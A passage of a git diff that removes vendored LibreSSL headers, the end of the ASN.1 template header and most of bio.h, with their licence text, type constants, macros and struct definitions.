-#define ASN1_ITYPE_SEQUENCE		0x1
-
-#define ASN1_ITYPE_CHOICE		0x2
-
-#define ASN1_ITYPE_EXTERN		0x4
-
-#define ASN1_ITYPE_MSTRING		0x5
-
-#define ASN1_ITYPE_NDEF_SEQUENCE	0x6
-
-/* Cache for ASN1 tag and length, so we
- * don't keep re-reading it for things
- * like CHOICE
- */
-
-struct ASN1_TLC_st{
-	char valid;	/* Values below are valid */
-	int ret;	/* return value */
-	long plen;	/* length */
-	int ptag;	/* class value */
-	int pclass;	/* class value */
-	int hdrlen;	/* header length */
-};
-
-/* Typedefs for ASN1 function pointers */
-
-typedef ASN1_VALUE * ASN1_new_func(void);
-typedef void ASN1_free_func(ASN1_VALUE *a);
-typedef ASN1_VALUE * ASN1_d2i_func(ASN1_VALUE **a, const unsigned char ** in, long length);
-typedef int ASN1_i2d_func(ASN1_VALUE * a, unsigned char **in);
-
-typedef int ASN1_ex_d2i(ASN1_VALUE **pval, const unsigned char **in, long len, const ASN1_ITEM *it,
-					int tag, int aclass, char opt, ASN1_TLC *ctx);
-
-typedef int ASN1_ex_i2d(ASN1_VALUE **pval, unsigned char **out, const ASN1_ITEM *it, int tag, int aclass);
-typedef int ASN1_ex_new_func(ASN1_VALUE **pval, const ASN1_ITEM *it);
-typedef void ASN1_ex_free_func(ASN1_VALUE **pval, const ASN1_ITEM *it);
-
-typedef int ASN1_ex_print_func(BIO *out, ASN1_VALUE **pval, 
-						int indent, const char *fname, 
-						const ASN1_PCTX *pctx);
-
-typedef int ASN1_primitive_i2c(ASN1_VALUE **pval, unsigned char *cont, int *putype, const ASN1_ITEM *it);
-typedef int ASN1_primitive_c2i(ASN1_VALUE **pval, const unsigned char *cont, int len, int utype, char *free_cont, const ASN1_ITEM *it);
-typedef int ASN1_primitive_print(BIO *out, ASN1_VALUE **pval, const ASN1_ITEM *it, int indent, const ASN1_PCTX *pctx);
-
-typedef struct ASN1_EXTERN_FUNCS_st {
-	void *app_data;
-	ASN1_ex_new_func *asn1_ex_new;
-	ASN1_ex_free_func *asn1_ex_free;
-	ASN1_ex_free_func *asn1_ex_clear;
-	ASN1_ex_d2i *asn1_ex_d2i;
-	ASN1_ex_i2d *asn1_ex_i2d;
-	ASN1_ex_print_func *asn1_ex_print;
-} ASN1_EXTERN_FUNCS;
-
-typedef struct ASN1_PRIMITIVE_FUNCS_st {
-	void *app_data;
-	unsigned long flags;
-	ASN1_ex_new_func *prim_new;
-	ASN1_ex_free_func *prim_free;
-	ASN1_ex_free_func *prim_clear;
-	ASN1_primitive_c2i *prim_c2i;
-	ASN1_primitive_i2c *prim_i2c;
-	ASN1_primitive_print *prim_print;
-} ASN1_PRIMITIVE_FUNCS;
-
-/* This is the ASN1_AUX structure: it handles various
- * miscellaneous requirements. For example the use of
- * reference counts and an informational callback.
- *
- * The "informational callback" is called at various
- * points during the ASN1 encoding and decoding. It can
- * be used to provide minor customisation of the structures
- * used. This is most useful where the supplied routines
- * *almost* do the right thing but need some extra help
- * at a few points. If the callback returns zero then
- * it is assumed a fatal error has occurred and the 
- * main operation should be abandoned.
- *
- * If major changes in the default behaviour are required
- * then an external type is more appropriate.
- */
-
-typedef int ASN1_aux_cb(int operation, ASN1_VALUE **in, const ASN1_ITEM *it,
-				void *exarg);
-
-typedef struct ASN1_AUX_st {
-	void *app_data;
-	int flags;
-	int ref_offset;		/* Offset of reference value */
-	int ref_lock;		/* Lock type to use */
-	ASN1_aux_cb *asn1_cb;
-	int enc_offset;		/* Offset of ASN1_ENCODING structure */
-} ASN1_AUX;
-
-/* For print related callbacks exarg points to this structure */
-typedef struct ASN1_PRINT_ARG_st {
-	BIO *out;
-	int indent;
-	const ASN1_PCTX *pctx;
-} ASN1_PRINT_ARG;
-
-/* For streaming related callbacks exarg points to this structure */
-typedef struct ASN1_STREAM_ARG_st {
-	/* BIO to stream through */
-	BIO *out;
-	/* BIO with filters appended */
-	BIO *ndef_bio;
-	/* Streaming I/O boundary */
-	unsigned char **boundary;
-} ASN1_STREAM_ARG;
-
-/* Flags in ASN1_AUX */
-
-/* Use a reference count */
-#define ASN1_AFLG_REFCOUNT	1
-/* Save the encoding of structure (useful for signatures) */
-#define ASN1_AFLG_ENCODING	2
-/* The Sequence length is invalid */
-#define ASN1_AFLG_BROKEN	4
-
-/* operation values for asn1_cb */
-
-#define ASN1_OP_NEW_PRE		0
-#define ASN1_OP_NEW_POST	1
-#define ASN1_OP_FREE_PRE	2
-#define ASN1_OP_FREE_POST	3
-#define ASN1_OP_D2I_PRE		4
-#define ASN1_OP_D2I_POST	5
-#define ASN1_OP_I2D_PRE		6
-#define ASN1_OP_I2D_POST	7
-#define ASN1_OP_PRINT_PRE	8
-#define ASN1_OP_PRINT_POST	9
-#define ASN1_OP_STREAM_PRE	10
-#define ASN1_OP_STREAM_POST	11
-#define ASN1_OP_DETACHED_PRE	12
-#define ASN1_OP_DETACHED_POST	13
-
-#ifndef LIBRESSL_INTERNAL
-
-/* Macro to implement a primitive type */
-#define IMPLEMENT_ASN1_TYPE(stname) IMPLEMENT_ASN1_TYPE_ex(stname, stname, 0)
-#define IMPLEMENT_ASN1_TYPE_ex(itname, vname, ex) \
-				ASN1_ITEM_start(itname) \
-					ASN1_ITYPE_PRIMITIVE, V_##vname, NULL, 0, NULL, ex, #itname \
-				ASN1_ITEM_end(itname)
-
-/* Macro to implement a multi string type */
-#define IMPLEMENT_ASN1_MSTRING(itname, mask) \
-				ASN1_ITEM_start(itname) \
-					ASN1_ITYPE_MSTRING, mask, NULL, 0, NULL, sizeof(ASN1_STRING), #itname \
-				ASN1_ITEM_end(itname)
-#define IMPLEMENT_EXTERN_ASN1(sname, tag, fptrs) \
-	ASN1_ITEM_start(sname) \
-		ASN1_ITYPE_EXTERN, \
-		tag, \
-		NULL, \
-		0, \
-		&fptrs, \
-		0, \
-		#sname \
-	ASN1_ITEM_end(sname)
-
-/* Macro to implement standard functions in terms of ASN1_ITEM structures */
-
-#define IMPLEMENT_ASN1_FUNCTIONS(stname) IMPLEMENT_ASN1_FUNCTIONS_fname(stname, stname, stname)
-
-#define IMPLEMENT_ASN1_FUNCTIONS_name(stname, itname) IMPLEMENT_ASN1_FUNCTIONS_fname(stname, itname, itname)
-
-#define IMPLEMENT_ASN1_FUNCTIONS_ENCODE_name(stname, itname) \
-			IMPLEMENT_ASN1_FUNCTIONS_ENCODE_fname(stname, itname, itname)
-
-#define IMPLEMENT_STATIC_ASN1_ALLOC_FUNCTIONS(stname) \
-		IMPLEMENT_ASN1_ALLOC_FUNCTIONS_pfname(static, stname, stname, stname)
-
-#define IMPLEMENT_ASN1_ALLOC_FUNCTIONS(stname) \
-		IMPLEMENT_ASN1_ALLOC_FUNCTIONS_fname(stname, stname, stname)
-
-#define IMPLEMENT_ASN1_ALLOC_FUNCTIONS_pfname(pre, stname, itname, fname) \
-	pre stname *fname##_new(void) \
-	{ \
-		return (stname *)ASN1_item_new(ASN1_ITEM_rptr(itname)); \
-	} \
-	pre void fname##_free(stname *a) \
-	{ \
-		ASN1_item_free((ASN1_VALUE *)a, ASN1_ITEM_rptr(itname)); \
-	}
-
-#define IMPLEMENT_ASN1_ALLOC_FUNCTIONS_fname(stname, itname, fname) \
-	stname *fname##_new(void) \
-	{ \
-		return (stname *)ASN1_item_new(ASN1_ITEM_rptr(itname)); \
-	} \
-	void fname##_free(stname *a) \
-	{ \
-		ASN1_item_free((ASN1_VALUE *)a, ASN1_ITEM_rptr(itname)); \
-	}
-
-#define IMPLEMENT_ASN1_FUNCTIONS_fname(stname, itname, fname) \
-	IMPLEMENT_ASN1_ENCODE_FUNCTIONS_fname(stname, itname, fname) \
-	IMPLEMENT_ASN1_ALLOC_FUNCTIONS_fname(stname, itname, fname)
-
-#define IMPLEMENT_ASN1_ENCODE_FUNCTIONS_fname(stname, itname, fname) \
-	stname *d2i_##fname(stname **a, const unsigned char **in, long len) \
-	{ \
-		return (stname *)ASN1_item_d2i((ASN1_VALUE **)a, in, len, ASN1_ITEM_rptr(itname));\
-	} \
-	int i2d_##fname(stname *a, unsigned char **out) \
-	{ \
-		return ASN1_item_i2d((ASN1_VALUE *)a, out, ASN1_ITEM_rptr(itname));\
-	} 
-
-#define IMPLEMENT_ASN1_NDEF_FUNCTION(stname) \
-	int i2d_##stname##_NDEF(stname *a, unsigned char **out) \
-	{ \
-		return ASN1_item_ndef_i2d((ASN1_VALUE *)a, out, ASN1_ITEM_rptr(stname));\
-	} 
-
-/* This includes evil casts to remove const: they will go away when full
- * ASN1 constification is done.
- */
-#define IMPLEMENT_ASN1_ENCODE_FUNCTIONS_const_fname(stname, itname, fname) \
-	stname *d2i_##fname(stname **a, const unsigned char **in, long len) \
-	{ \
-		return (stname *)ASN1_item_d2i((ASN1_VALUE **)a, in, len, ASN1_ITEM_rptr(itname));\
-	} \
-	int i2d_##fname(const stname *a, unsigned char **out) \
-	{ \
-		return ASN1_item_i2d((ASN1_VALUE *)a, out, ASN1_ITEM_rptr(itname));\
-	} 
-
-#define IMPLEMENT_ASN1_DUP_FUNCTION(stname) \
-	stname * stname##_dup(stname *x) \
-        { \
-        return ASN1_item_dup(ASN1_ITEM_rptr(stname), x); \
-        }
-
-#define IMPLEMENT_ASN1_PRINT_FUNCTION(stname) \
-	IMPLEMENT_ASN1_PRINT_FUNCTION_fname(stname, stname, stname)
-
-#define IMPLEMENT_ASN1_PRINT_FUNCTION_fname(stname, itname, fname) \
-	int fname##_print_ctx(BIO *out, stname *x, int indent, \
-						const ASN1_PCTX *pctx) \
-	{ \
-		return ASN1_item_print(out, (ASN1_VALUE *)x, indent, \
-			ASN1_ITEM_rptr(itname), pctx); \
-	} 
-
-#define IMPLEMENT_ASN1_FUNCTIONS_const(name) \
-		IMPLEMENT_ASN1_FUNCTIONS_const_fname(name, name, name)
-
-#define IMPLEMENT_ASN1_FUNCTIONS_const_fname(stname, itname, fname) \
-	IMPLEMENT_ASN1_ENCODE_FUNCTIONS_const_fname(stname, itname, fname) \
-	IMPLEMENT_ASN1_ALLOC_FUNCTIONS_fname(stname, itname, fname)
-
-#endif /* !LIBRESSL_INTERNAL */
-
-/* external definitions for primitive types */
-
-extern const ASN1_ITEM ASN1_BOOLEAN_it;
-extern const ASN1_ITEM ASN1_TBOOLEAN_it;
-extern const ASN1_ITEM ASN1_FBOOLEAN_it;
-extern const ASN1_ITEM ASN1_SEQUENCE_it;
-extern const ASN1_ITEM CBIGNUM_it;
-extern const ASN1_ITEM BIGNUM_it;
-extern const ASN1_ITEM LONG_it;
-extern const ASN1_ITEM ZLONG_it;
-
-DECLARE_STACK_OF(ASN1_VALUE)
-
-/* Functions used internally by the ASN1 code */
-
-int ASN1_item_ex_new(ASN1_VALUE **pval, const ASN1_ITEM *it);
-void ASN1_item_ex_free(ASN1_VALUE **pval, const ASN1_ITEM *it);
-int ASN1_template_new(ASN1_VALUE **pval, const ASN1_TEMPLATE *tt);
-int ASN1_primitive_new(ASN1_VALUE **pval, const ASN1_ITEM *it);
-
-void ASN1_template_free(ASN1_VALUE **pval, const ASN1_TEMPLATE *tt);
-int ASN1_template_d2i(ASN1_VALUE **pval, const unsigned char **in, long len, const ASN1_TEMPLATE *tt);
-int ASN1_item_ex_d2i(ASN1_VALUE **pval, const unsigned char **in, long len, const ASN1_ITEM *it,
-				int tag, int aclass, char opt, ASN1_TLC *ctx);
-
-int ASN1_item_ex_i2d(ASN1_VALUE **pval, unsigned char **out, const ASN1_ITEM *it, int tag, int aclass);
-int ASN1_template_i2d(ASN1_VALUE **pval, unsigned char **out, const ASN1_TEMPLATE *tt);
-void ASN1_primitive_free(ASN1_VALUE **pval, const ASN1_ITEM *it);
-
-int asn1_ex_c2i(ASN1_VALUE **pval, const unsigned char *cont, int len, int utype, char *free_cont, const ASN1_ITEM *it);
-
-int asn1_get_choice_selector(ASN1_VALUE **pval, const ASN1_ITEM *it);
-int asn1_set_choice_selector(ASN1_VALUE **pval, int value, const ASN1_ITEM *it);
-
-ASN1_VALUE ** asn1_get_field_ptr(ASN1_VALUE **pval, const ASN1_TEMPLATE *tt);
-
-const ASN1_TEMPLATE *asn1_do_adb(ASN1_VALUE **pval, const ASN1_TEMPLATE *tt, int nullerr);
-
-int asn1_do_lock(ASN1_VALUE **pval, int op, const ASN1_ITEM *it);
-
-void asn1_enc_init(ASN1_VALUE **pval, const ASN1_ITEM *it);
-void asn1_enc_free(ASN1_VALUE **pval, const ASN1_ITEM *it);
-int asn1_enc_restore(int *len, unsigned char **out, ASN1_VALUE **pval, const ASN1_ITEM *it);
-int asn1_enc_save(ASN1_VALUE **pval, const unsigned char *in, int inlen, const ASN1_ITEM *it);
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/bio.h b/thirdparty/libressl/include/openssl/bio.h
deleted file mode 100644
index b753596..0000000
--- a/thirdparty/libressl/include/openssl/bio.h
+++ /dev/null
@@ -1,792 +0,0 @@
-/* $OpenBSD: bio.h,v 1.30 2017/04/06 18:25:38 deraadt Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- * 
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- * 
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- * 
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from 
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- * 
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- * 
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_BIO_H
-#define HEADER_BIO_H
-#if !defined(HAVE_ATTRIBUTE__BOUNDED__) && !defined(__OpenBSD__)
-#define __bounded__(x, y, z)
-#endif
-#include <openssl/opensslconf.h>
-
-# include <stdio.h>
-#include <stdarg.h>
-
-#include <openssl/crypto.h>
-
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-/* These are the 'types' of BIOs */
-#define BIO_TYPE_NONE		0
-#define BIO_TYPE_MEM		(1|0x0400)
-#define BIO_TYPE_FILE		(2|0x0400)
-
-#define BIO_TYPE_FD		(4|0x0400|0x0100)
-#define BIO_TYPE_SOCKET		(5|0x0400|0x0100)
-#define BIO_TYPE_NULL		(6|0x0400)
-#define BIO_TYPE_SSL		(7|0x0200)
-#define BIO_TYPE_MD		(8|0x0200)		/* passive filter */
-#define BIO_TYPE_BUFFER		(9|0x0200)		/* filter */
-#define BIO_TYPE_CIPHER		(10|0x0200)		/* filter */
-#define BIO_TYPE_BASE64		(11|0x0200)		/* filter */
-#define BIO_TYPE_CONNECT	(12|0x0400|0x0100)	/* socket - connect */
-#define BIO_TYPE_ACCEPT		(13|0x0400|0x0100)	/* socket for accept */
-#define BIO_TYPE_PROXY_CLIENT	(14|0x0200)		/* client proxy BIO */
-#define BIO_TYPE_PROXY_SERVER	(15|0x0200)		/* server proxy BIO */
-#define BIO_TYPE_NBIO_TEST	(16|0x0200)		/* server proxy BIO */
-#define BIO_TYPE_NULL_FILTER	(17|0x0200)
-#define BIO_TYPE_BER		(18|0x0200)		/* BER -> bin filter */
-#define BIO_TYPE_BIO		(19|0x0400)		/* (half a) BIO pair */
-#define BIO_TYPE_LINEBUFFER	(20|0x0200)		/* filter */
-#define BIO_TYPE_DGRAM		(21|0x0400|0x0100)
-#define BIO_TYPE_ASN1 		(22|0x0200)		/* filter */
-#define BIO_TYPE_COMP 		(23|0x0200)		/* filter */
-
-#define BIO_TYPE_DESCRIPTOR	0x0100	/* socket, fd, connect or accept */
-#define BIO_TYPE_FILTER		0x0200
-#define BIO_TYPE_SOURCE_SINK	0x0400
-
-/* BIO_FILENAME_READ|BIO_CLOSE to open or close on free.
- * BIO_set_fp(in,stdin,BIO_NOCLOSE); */
-#define BIO_NOCLOSE		0x00
-#define BIO_CLOSE		0x01
-
-/* These are used in the following macros and are passed to
- * BIO_ctrl() */
-#define BIO_CTRL_RESET		1  /* opt - rewind/zero etc */
-#define BIO_CTRL_EOF		2  /* opt - are we at the eof */
-#define BIO_CTRL_INFO		3  /* opt - extra tit-bits */
-#define BIO_CTRL_SET		4  /* man - set the 'IO' type */
-#define BIO_CTRL_GET		5  /* man - get the 'IO' type */
-#define BIO_CTRL_PUSH		6  /* opt - internal, used to signify change */
-#define BIO_CTRL_POP		7  /* opt - internal, used to signify change */
-#define BIO_CTRL_GET_CLOSE	8  /* man - set the 'close' on free */
-#define BIO_CTRL_SET_CLOSE	9  /* man - set the 'close' on free */
-#define BIO_CTRL_PENDING	10  /* opt - is their more data buffered */
-#define BIO_CTRL_FLUSH		11  /* opt - 'flush' buffered output */
-#define BIO_CTRL_DUP		12  /* man - extra stuff for 'duped' BIO */
-#define BIO_CTRL_WPENDING	13  /* opt - number of bytes still to write */
-/* callback is int cb(BIO *bio,state,ret); */
-#define BIO_CTRL_SET_CALLBACK	14  /* opt - set callback function */
-#define BIO_CTRL_GET_CALLBACK	15  /* opt - set callback function */
-
-#define BIO_CTRL_SET_FILENAME	30	/* BIO_s_file special */
-
-/* dgram BIO stuff */
-#define BIO_CTRL_DGRAM_CONNECT       31  /* BIO dgram special */
-#define BIO_CTRL_DGRAM_SET_CONNECTED 32  /* allow for an externally
-					  * connected socket to be
-					  * passed in */ 
-#define BIO_CTRL_DGRAM_SET_RECV_TIMEOUT 33 /* setsockopt, essentially */
-#define BIO_CTRL_DGRAM_GET_RECV_TIMEOUT 34 /* getsockopt, essentially */
-#define BIO_CTRL_DGRAM_SET_SEND_TIMEOUT 35 /* setsockopt, essentially */
-#define BIO_CTRL_DGRAM_GET_SEND_TIMEOUT 36 /* getsockopt, essentially */
-
-#define BIO_CTRL_DGRAM_GET_RECV_TIMER_EXP 37 /* flag whether the last */
-#define BIO_CTRL_DGRAM_GET_SEND_TIMER_EXP 38 /* I/O operation tiemd out */
-
-/* #ifdef IP_MTU_DISCOVER */
-#define BIO_CTRL_DGRAM_MTU_DISCOVER       39 /* set DF bit on egress packets */
-/* #endif */
-
-#define BIO_CTRL_DGRAM_QUERY_MTU          40 /* as kernel for current MTU */
-#define BIO_CTRL_DGRAM_GET_FALLBACK_MTU   47
-#define BIO_CTRL_DGRAM_GET_MTU            41 /* get cached value for MTU */
-#define BIO_CTRL_DGRAM_SET_MTU            42 /* set cached value for
-					      * MTU. want to use this
-					      * if asking the kernel
-					      * fails */
-
-#define BIO_CTRL_DGRAM_MTU_EXCEEDED       43 /* check whether the MTU
-					      * was exceed in the
-					      * previous write
-					      * operation */
-
-#define BIO_CTRL_DGRAM_GET_PEER           46
-#define BIO_CTRL_DGRAM_SET_PEER           44 /* Destination for the data */
-
-#define BIO_CTRL_DGRAM_SET_NEXT_TIMEOUT   45 /* Next DTLS handshake timeout to
-                                              * adjust socket timeouts */
-
-
-/* modifiers */
-#define BIO_FP_READ		0x02
-#define BIO_FP_WRITE		0x04
-#define BIO_FP_APPEND		0x08
-#define BIO_FP_TEXT		0x10
-
-#define BIO_FLAGS_READ		0x01
-#define BIO_FLAGS_WRITE		0x02
-#define BIO_FLAGS_IO_SPECIAL	0x04
-#define BIO_FLAGS_RWS (BIO_FLAGS_READ|BIO_FLAGS_WRITE|BIO_FLAGS_IO_SPECIAL)
-#define BIO_FLAGS_SHOULD_RETRY	0x08
-
-/* Used in BIO_gethostbyname() */
-#define BIO_GHBN_CTRL_HITS		1
-#define BIO_GHBN_CTRL_MISSES		2
-#define BIO_GHBN_CTRL_CACHE_SIZE	3
-#define BIO_GHBN_CTRL_GET_ENTRY		4
-#define BIO_GHBN_CTRL_FLUSH		5
-
-/* Mostly used in the SSL BIO */
-/* Not used anymore
- * #define BIO_FLAGS_PROTOCOL_DELAYED_READ 0x10
- * #define BIO_FLAGS_PROTOCOL_DELAYED_WRITE 0x20
- * #define BIO_FLAGS_PROTOCOL_STARTUP	0x40
- */
-
-#define BIO_FLAGS_BASE64_NO_NL	0x100
-
-/* This is used with memory BIOs: it means we shouldn't free up or change the
- * data in any way.
- */
-#define BIO_FLAGS_MEM_RDONLY	0x200
-
-typedef struct bio_st BIO;
-
-void BIO_set_flags(BIO *b, int flags);
-int  BIO_test_flags(const BIO *b, int flags);
-void BIO_clear_flags(BIO *b, int flags);
-
-#define BIO_get_flags(b) BIO_test_flags(b, ~(0x0))
-#define BIO_set_retry_special(b) \
-		BIO_set_flags(b, (BIO_FLAGS_IO_SPECIAL|BIO_FLAGS_SHOULD_RETRY))
-#define BIO_set_retry_read(b) \
-		BIO_set_flags(b, (BIO_FLAGS_READ|BIO_FLAGS_SHOULD_RETRY))
-#define BIO_set_retry_write(b) \
-		BIO_set_flags(b, (BIO_FLAGS_WRITE|BIO_FLAGS_SHOULD_RETRY))
-
-/* These are normally used internally in BIOs */
-#define BIO_clear_retry_flags(b) \
-		BIO_clear_flags(b, (BIO_FLAGS_RWS|BIO_FLAGS_SHOULD_RETRY))
-#define BIO_get_retry_flags(b) \
-		BIO_test_flags(b, (BIO_FLAGS_RWS|BIO_FLAGS_SHOULD_RETRY))
-
-/* These should be used by the application to tell why we should retry */
-#define BIO_should_read(a)		BIO_test_flags(a, BIO_FLAGS_READ)
-#define BIO_should_write(a)		BIO_test_flags(a, BIO_FLAGS_WRITE)
-#define BIO_should_io_special(a)	BIO_test_flags(a, BIO_FLAGS_IO_SPECIAL)
-#define BIO_retry_type(a)		BIO_test_flags(a, BIO_FLAGS_RWS)
-#define BIO_should_retry(a)		BIO_test_flags(a, BIO_FLAGS_SHOULD_RETRY)
-
-/* The next three are used in conjunction with the
- * BIO_should_io_special() condition.  After this returns true,
- * BIO *BIO_get_retry_BIO(BIO *bio, int *reason); will walk the BIO 
- * stack and return the 'reason' for the special and the offending BIO.
- * Given a BIO, BIO_get_retry_reason(bio) will return the code. */
-/* Returned from the SSL bio when the certificate retrieval code had an error */
-#define BIO_RR_SSL_X509_LOOKUP		0x01
-/* Returned from the connect BIO when a connect would have blocked */
-#define BIO_RR_CONNECT			0x02
-/* Returned from the accept BIO when an accept would have blocked */
-#define BIO_RR_ACCEPT			0x03
-
-/* These are passed by the BIO callback */
-#define BIO_CB_FREE	0x01
-#define BIO_CB_READ	0x02
-#define BIO_CB_WRITE	0x03
-#define BIO_CB_PUTS	0x04
-#define BIO_CB_GETS	0x05
-#define BIO_CB_CTRL	0x06
-
-/* The callback is called before and after the underling operation,
- * The BIO_CB_RETURN flag indicates if it is after the call */
-#define BIO_CB_RETURN	0x80
-#define BIO_CB_return(a) ((a)|BIO_CB_RETURN))
-#define BIO_cb_pre(a)	(!((a)&BIO_CB_RETURN))
-#define BIO_cb_post(a)	((a)&BIO_CB_RETURN)
-
-long (*BIO_get_callback(const BIO *b))(struct bio_st *, int, const char *,
-    int, long, long);
-void BIO_set_callback(BIO *b,
-    long (*callback)(struct bio_st *, int, const char *, int, long, long));
-char *BIO_get_callback_arg(const BIO *b);
-void BIO_set_callback_arg(BIO *b, char *arg);
-
-const char * BIO_method_name(const BIO *b);
-int BIO_method_type(const BIO *b);
-
-typedef void bio_info_cb(struct bio_st *, int, const char *, int, long, long);
-
-typedef struct bio_method_st {
-	int type;
-	const char *name;
-	int (*bwrite)(BIO *, const char *, int);
-	int (*bread)(BIO *, char *, int);
-	int (*bputs)(BIO *, const char *);
-	int (*bgets)(BIO *, char *, int);
-	long (*ctrl)(BIO *, int, long, void *);
-	int (*create)(BIO *);
-	int (*destroy)(BIO *);
-	long (*callback_ctrl)(BIO *, int, bio_info_cb *);
-} BIO_METHOD;
-
-struct bio_st {
-	BIO_METHOD *method;
-	/* bio, mode, argp, argi, argl, ret */
-	long (*callback)(struct bio_st *, int, const char *, int, long, long);
-	char *cb_arg; /* first argument for the callback */
-
-	int init;
-	int shutdown;
-	int flags;	/* extra storage */
-	int retry_reason;
-	int num;
-	void *ptr;
-	struct bio_st *next_bio;	/* used by filter BIOs */
-	struct bio_st *prev_bio;	/* used by filter BIOs */
-	int references;
-	unsigned long num_read;
-	unsigned long num_write;
-
-	CRYPTO_EX_DATA ex_data;
-};
-
-DECLARE_STACK_OF(BIO)
-
-typedef struct bio_f_buffer_ctx_struct {
-	/* Buffers are setup like this:
-	 *
-	 * <---------------------- size ----------------------->
-	 * +---------------------------------------------------+
-	 * | consumed | remaining          | free space        |
-	 * +---------------------------------------------------+
-	 * <-- off --><------- len ------->
-	 */
-
-	/* BIO *bio; */ /* this is now in the BIO struct */
-	int ibuf_size;	/* how big is the input buffer */
-	int obuf_size;	/* how big is the output buffer */
-
-	char *ibuf;	/* the char array */
-	int ibuf_len;	/* how many bytes are in it */
-	int ibuf_off;	/* write/read offset */
-
-	char *obuf;	/* the char array */
-	int obuf_len;	/* how many bytes are in it */
-	int obuf_off;	/* write/read offset */
-} BIO_F_BUFFER_CTX;
-
-/* Prefix and suffix callback in ASN1 BIO */
-typedef int asn1_ps_func(BIO *b, unsigned char **pbuf, int *plen, void *parg);
-
-
-/* connect BIO stuff */
-#define BIO_CONN_S_BEFORE		1
-#define BIO_CONN_S_GET_IP		2
-#define BIO_CONN_S_GET_PORT		3
-#define BIO_CONN_S_CREATE_SOCKET	4
-#define BIO_CONN_S_CONNECT		5
-#define BIO_CONN_S_OK			6
-#define BIO_CONN_S_BLOCKED_CONNECT	7
-#define BIO_CONN_S_NBIO			8
-/*#define BIO_CONN_get_param_hostname	BIO_ctrl */
-
-#define BIO_C_SET_CONNECT			100
-#define BIO_C_DO_STATE_MACHINE			101
-#define BIO_C_SET_NBIO				102
-#define BIO_C_SET_PROXY_PARAM			103
-#define BIO_C_SET_FD				104
-#define BIO_C_GET_FD				105
-#define BIO_C_SET_FILE_PTR			106
-#define BIO_C_GET_FILE_PTR			107
-#define BIO_C_SET_FILENAME			108
-#define BIO_C_SET_SSL				109
-#define BIO_C_GET_SSL				110
-#define BIO_C_SET_MD				111
-#define BIO_C_GET_MD				112
-#define BIO_C_GET_CIPHER_STATUS			113
-#define BIO_C_SET_BUF_MEM			114
-#define BIO_C_GET_BUF_MEM_PTR			115
-#define BIO_C_GET_BUFF_NUM_LINES		116
-#define BIO_C_SET_BUFF_SIZE			117
-#define BIO_C_SET_ACCEPT			118
-#define BIO_C_SSL_MODE				119
-#define BIO_C_GET_MD_CTX			120
-#define BIO_C_GET_PROXY_PARAM			121
-#define BIO_C_SET_BUFF_READ_DATA		122 /* data to read first */
-#define BIO_C_GET_CONNECT			123
-#define BIO_C_GET_ACCEPT			124
-#define BIO_C_SET_SSL_RENEGOTIATE_BYTES		125
-#define BIO_C_GET_SSL_NUM_RENEGOTIATES		126
-#define BIO_C_SET_SSL_RENEGOTIATE_TIMEOUT	127
-#define BIO_C_FILE_SEEK				128
-#define BIO_C_GET_CIPHER_CTX			129
-#define BIO_C_SET_BUF_MEM_EOF_RETURN		130/*return end of input value*/
-#define BIO_C_SET_BIND_MODE			131
-#define BIO_C_GET_BIND_MODE			132
-#define BIO_C_FILE_TELL				133
-#define BIO_C_GET_SOCKS				134
-#define BIO_C_SET_SOCKS				135
-
-#define BIO_C_SET_WRITE_BUF_SIZE		136/* for BIO_s_bio */
-#define BIO_C_GET_WRITE_BUF_SIZE		137
-#define BIO_C_MAKE_BIO_PAIR			138
-#define BIO_C_DESTROY_BIO_PAIR			139
-#define BIO_C_GET_WRITE_GUARANTEE		140
-#define BIO_C_GET_READ_REQUEST			141
-#define BIO_C_SHUTDOWN_WR			142
-#define BIO_C_NREAD0				143
-#define BIO_C_NREAD				144
-#define BIO_C_NWRITE0				145
-#define BIO_C_NWRITE				146
